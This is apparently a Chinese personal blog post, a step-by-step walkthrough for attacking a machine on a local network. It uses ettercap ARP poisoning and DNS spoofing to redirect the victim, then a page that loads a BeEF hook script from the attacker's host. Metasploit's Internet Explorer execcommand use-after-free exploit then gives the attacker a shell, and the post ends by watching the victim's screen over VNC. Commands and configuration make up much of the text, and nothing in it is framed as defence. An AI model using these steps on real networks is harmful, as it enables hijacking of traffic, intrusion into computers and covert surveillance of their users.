metasploit配合beef+ettercap局域网dns劫持拿shell

metasploit

所用工具:metasploit   beef  ettercap


首先我们通过

ettercap -G 打开我们的ettercap工具


指定网卡  Sniff -> Unified sniffing -> Ok


然后通过  Hosts->Scan for hosts 扫描一下局域网的机器,通过 Hosts->Hosts list 显示出来,如图


其中 192.168.2.1为网关,192.168.2.105为受害机器


我们选中192.168.2.105  Add to Target 1

选中网关 192.168.2.1 Add to Target 2

如图


选中 Mitm -> Arp poisoning -> 勾选Sniff remote connections  点ok  如图



选中 Plugins -> Manage the Plugins -> 双击 dns_spoof



这样我们就完成了受害机器的dns劫持过程,我们修改一下

vim /etc/ettercap/etter.dns


使其无论打开什么网址,其实打开的都是 192.168.1.104   ok  一切准备就绪,我们开始运行ettercap 如图:


好了,我们在受害机器了ping一下,看看是否劫持成功


没有问题,所有的网址都没劫持到192.168.2.104上



接下来,我们使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell

刚开始的时候,需要beef和metasploit关联一下

我们配置一下

vim /usr/share/beef-xss/config.yaml

开启metasploit 拓展

然后配置一下拓展下的metasploit配置文件

vim /usr/share/beef-xss/extensions/metasploit/config.yaml



把ip填写成攻击机器的ip,把metasploit路径填上,保存.

这就完成了beef和metasploit的关联

然后把metasploit的服务开启,


由于使用PostgreSQL作为数据库,因此,必须先运行它。

root@kali:~# service postgresql start


启动Metasploit服务

root@kali:~# service metasploit start


在命令行下用msfconsole把控制台打开,接着加载beEF。所用命令为:“load msgrpc ServerHost=192.168.2.104 Pass=abc123”


下面我们来启动beef

cd /usr/share/beef-xss/
./beef -x




我们看到   metasploit 已经加载进来了


我们通过 http://192.168.2.104:3000/ui/panel 打开beef界面,用户名和密码都是beef


好了,现在一切都已经准备好,让我们用php编写一个程序,去搞shell吧

vim /var/www/index.php
<html>
<head>
<script src="http://192.168.2.104:3000/hook.js"></script>
</head>
</html>

我们再进入msf

use exploit/windows/browser/ie_execcommand_uaf 
set SRVHOST 192.168.2.104
set URIPATH /
exploit


这样就完成了监听,一旦目标机器打开网站


给他一个跳转,让它跳转到   http://192.168.2.104:8080


看一眼我们的metaspolt 已经拿到了


使用sessions -i  id号  控制目标机器


好了   运行一下 run vnc 看看他在干什么吧 


好了  最后一张图  完结  累死

2015-12-07 21:10:13

渗透
渗透

这是介绍的地方

渗透的标签

推荐应用

友情链接


皖ICP备14007051号-2 关于穆子龙